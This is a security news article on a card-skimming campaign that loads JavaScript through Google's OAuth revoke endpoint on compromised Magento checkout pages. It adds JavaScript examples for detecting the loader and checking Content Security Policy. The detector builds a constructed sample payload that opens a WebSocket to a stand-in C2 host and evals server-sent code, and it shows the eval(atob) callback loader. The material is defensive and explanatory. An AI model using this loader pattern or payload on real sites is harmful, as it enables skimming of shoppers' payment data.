Security researchers at c/side have documented a browser-based malware campaign that abuses Google's trusted OAuth domain to deliver malicious JavaScript. Because the loader is fetched from accounts.google.com, it slips past antivirus and domain-reputation filters, and it targets shoppers while they are on a checkout page.
How the Attack Works: Trusted Domain, Hidden Payload
The campaign begins on a Magento-based e-commerce site that attackers have already compromised. Into the site's pages they inject a script tag whose src points at Google's OAuth token-revocation endpoint, accounts.google.com/o/oauth2/revoke, with a crafted callback parameter. The endpoint behaves like a JSONP service: it echoes the callback value back in its response body, so the browser receives a script served from accounts.google.com whose content is attacker-controlled. The callback is an eval(atob(…)) expression that decodes a base64 blob and executes the obfuscated JavaScript inside it. Because Google domains are routinely allowlisted in Content Security Policy script-src directives and in DNS and proxy filtering, the payload loads without tripping those controls.
Execution is gated on context. The decoded script only proceeds in specific situations, for example when it detects an automated browser session or when the page URL contains "checkout". Once active, it opens a WebSocket connection to an attacker-controlled server, which pushes further JavaScript that the client executes in real time. That channel lets the operators run the rest of the attack on demand: harvesting payment and other sensitive data from the checkout page, or delivering additional stages.
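The loader pattern described above is easy to spot once you look for it: a script src on the revoke endpoint whose callback is code rather than a bare function name. The following is an added example, written for this page and not code from c/side or from the campaign, that parses such a URL, pulls the base64 out of eval(atob('…')), decodes it, and reports what the hidden payload does. The sample payload and the wss://c2.example host are constructed for the demonstration; the indicator list (checkout gate, WebSocket, dynamic eval) is an assumption about what a defender would want to flag, not a published signature.

```javascript
// Added example: detect the Google OAuth "revoke" endpoint being used as a JSONP
// loader and inspect the payload hidden in its callback parameter.
// Runs under Node.js; Buffer is a Node global.

const REVOKE_HOST = 'accounts.google.com';
const REVOKE_PATH = '/o/oauth2/revoke';

// Constructed sample payload (not the real campaign's code): a checkout gate,
// a WebSocket back to a C2 host, and eval() of whatever the server sends.
const SAMPLE_PAYLOAD =
  "if(location.href.indexOf('checkout')!==-1){var s=new WebSocket('wss://c2.example/socket');s.onmessage=function(e){eval(e.data)}}";

// Build a script src the way the injected tag would look: the callback is
// eval(atob('<base64 of payload>')), URL-encoded by URLSearchParams.
function buildSampleSrc(payload) {
  const u = new URL(`https://${REVOKE_HOST}${REVOKE_PATH}`);
  const b64 = Buffer.from(payload, 'utf8').toString('base64');
  u.searchParams.set('callback', `eval(atob('${b64}'))`);
  return u.toString();
}

// Pull every base64 literal wrapped in atob('...') / atob("...") and decode it.
function extractAtobPayloads(callback) {
  const out = [];
  const re = /atob\(\s*(['"])([A-Za-z0-9+/=]+)\1\s*\)/g;
  let m;
  while ((m = re.exec(callback)) !== null) {
    out.push(Buffer.from(m[2], 'base64').toString('utf8'));
  }
  return out;
}

// Heuristic indicators over the decoded payload (assumed list, not a published IOC set).
function describePayload(decoded) {
  return {
    checkoutGate: /checkout/i.test(decoded),
    webSocket: /new\s+WebSocket\s*\(/.test(decoded),
    dynamicEval: /\beval\s*\(|new\s+Function\s*\(/.test(decoded),
  };
}

// Decide whether a <script src> is the abused revoke endpoint.
function analyseScriptSrc(src) {
  let url;
  try {
    url = new URL(src);
  } catch {
    return { suspicious: false, reason: 'unparseable URL' };
  }
  if (url.hostname !== REVOKE_HOST || url.pathname !== REVOKE_PATH) {
    return { suspicious: false, reason: 'not the revoke endpoint' };
  }
  const callback = url.searchParams.get('callback') || '';
  // A legitimate JSONP callback is a bare identifier such as handleRevoke or app.onRevoke.
  if (/^[A-Za-z_$][\w$.]*$/.test(callback)) {
    return { suspicious: false, reason: 'plain callback identifier' };
  }
  const decoded = extractAtobPayloads(callback);
  return {
    suspicious: true,
    reason: decoded.length
      ? 'callback carries eval(atob(...)) payload'
      : 'callback contains code rather than an identifier',
    decoded,
    indicators: decoded.map(describePayload),
  };
}

// Usage: run the detector over a constructed malicious src and a benign one.
console.log(JSON.stringify(analyseScriptSrc(buildSampleSrc(SAMPLE_PAYLOAD)), null, 2));
console.log(analyseScriptSrc('https://accounts.google.com/o/oauth2/revoke?callback=handleRevoke'));
```

The same function can be run over every script element on a page (document.scripts in a browser, or the src attributes pulled from a crawler's HTML) to inventory what a checkout page actually loads. Anything on the revoke endpoint whose callback is not a plain identifier deserves a look, regardless of how trusted the host is.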
Why Antivirus and Filters Fail
Traditional antivirus inspects files written to disk and programs that run on the host; it has little visibility into JavaScript that arrives over TLS from accounts.google.com and executes only in the browser's memory. Nothing is downloaded or installed. Domain-reputation systems and DNS-based filters see a request to Google and let it through. Enterprise endpoint protection usually treats browser script execution as normal activity, and will only catch this if it is configured to inspect dynamic script content or to flag unusual WebSocket connections from the browser process.
Defence Strategies: Layered Security for Safer Browsing
- Limit third-party scripts on e-commerce and other high-risk sites. Content-blocking extensions help on the client side; site operators should inventory every script tag served on checkout pages.
- Segment browser sessions: do not use the same browser profile for financial transactions and general browsing.
- Add behavioural monitoring: browser sandboxing, proxy inspection, or EDR rules that flag WebSocket connections from the browser to unfamiliar hosts.
- Adopt layered defences: combine endpoint protection with real-time script analysis and detection of trusted-domain abuse, where a reputable endpoint reflects attacker-supplied content back as script, as the revoke callback does here. Site operators should prefer nonce- or hash-based Content Security Policy over host allowlists, since an allowlist entry for accounts.google.com is exactly what this technique rides on.
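To make the CSP point concrete, here is an added example (not from the article or from c/side) that parses a Content-Security-Policy header and checks whether its script-src would let the revoke-endpoint loader execute. It contrasts a host-allowlist policy that permits accounts.google.com with a nonce plus 'strict-dynamic' policy that ignores host sources. The two headers and the loader URL are constructed for the demonstration; the nonce value is a placeholder.

```javascript
// Added example: evaluate a CSP script-src against the abused loader URL.
// Implements the host-source matching rules from CSP Level 3 in simplified form.

// Constructed policies: the weak one allowlists Google by host, the strict one
// relies on a per-response nonce and 'strict-dynamic'.
const WEAK_CSP =
  "default-src 'self'; script-src 'self' https://accounts.google.com https://www.googletagmanager.com";
const STRICT_CSP =
  "default-src 'self'; script-src 'nonce-r4nd0mN0nce' 'strict-dynamic' https:; object-src 'none'";
// Constructed loader URL in the shape the campaign uses (payload elided to a placeholder).
const LOADER_URL = "https://accounts.google.com/o/oauth2/revoke?callback=eval(atob('Li4u'))";

// Split "name v1 v2; name2 v3" into { name: [v1, v2], name2: [v3] }.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...values] = tokens;
    directives[name.toLowerCase()] = values;
  }
  return directives;
}

// Does one host-source expression (e.g. https://accounts.google.com, *.google.com,
// https:, cdn.example.com/libs/) match the given URL? Keyword sources ('self', nonces) never do.
function hostSourceMatches(source, url) {
  if (source.startsWith("'")) return false;
  if (source === '*') return true;
  const scheme = url.protocol.slice(0, -1).toLowerCase();
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) return source.slice(0, -1).toLowerCase() === scheme;
  const m = source.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)(?::(\d+|\*))?(\/.*)?$/i);
  if (!m) return false;
  const [, srcScheme, host, , path] = m;
  if (srcScheme && srcScheme.toLowerCase() !== scheme) return false;
  const h = host.toLowerCase();
  const hostOk = h.startsWith('*.') ? url.hostname.endsWith(h.slice(1)) : url.hostname === h;
  if (!hostOk) return false;
  if (path) {
    // A path ending in "/" is a prefix match; otherwise it must match exactly.
    if (path.endsWith('/')) return url.pathname.startsWith(path);
    return url.pathname === path;
  }
  return true;
}

// Would a parser-inserted <script src=scriptUrl> with no nonce be allowed to run?
function scriptSrcAllows(header, scriptUrl) {
  const d = parseCsp(header);
  const sources = d['script-src'] || d['default-src'];
  if (!sources) return { allowed: true, basis: 'no script-src or default-src: everything permitted' };
  const url = new URL(scriptUrl);
  const nonceOrHash = sources.some((s) => /^'(nonce-|sha(256|384|512)-)/i.test(s));
  if (nonceOrHash && sources.includes("'strict-dynamic'")) {
    return { allowed: false, basis: "'strict-dynamic' discards host sources; an injected tag carries no nonce" };
  }
  const match = sources.find((s) => hostSourceMatches(s, url));
  return match
    ? { allowed: true, basis: `matched host source ${match}` }
    : { allowed: false, basis: 'no matching host source' };
}

// Usage: the allowlist policy lets the loader through, the strict policy blocks it.
console.log('weak  :', scriptSrcAllows(WEAK_CSP, LOADER_URL));
console.log('strict:', scriptSrcAllows(STRICT_CSP, LOADER_URL));
```

One caveat belongs with this check. A nonce-based policy stops a script tag that is injected client-side or by an attacker who cannot change the server-side template, because they cannot predict the nonce. In this campaign the Magento site itself was compromised, so an attacker with template access could emit the nonce alongside their tag; the CSP then reduces the exposure rather than eliminating it, and the script inventory and WebSocket monitoring in the list above remain necessary.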
About the Author – Anirudh Mittal is a B.Sc. LL.B. (Hons.) student at National Forensic Sciences University, Gandhinagar, with a keen interest in corporate law and tech-driven legal change.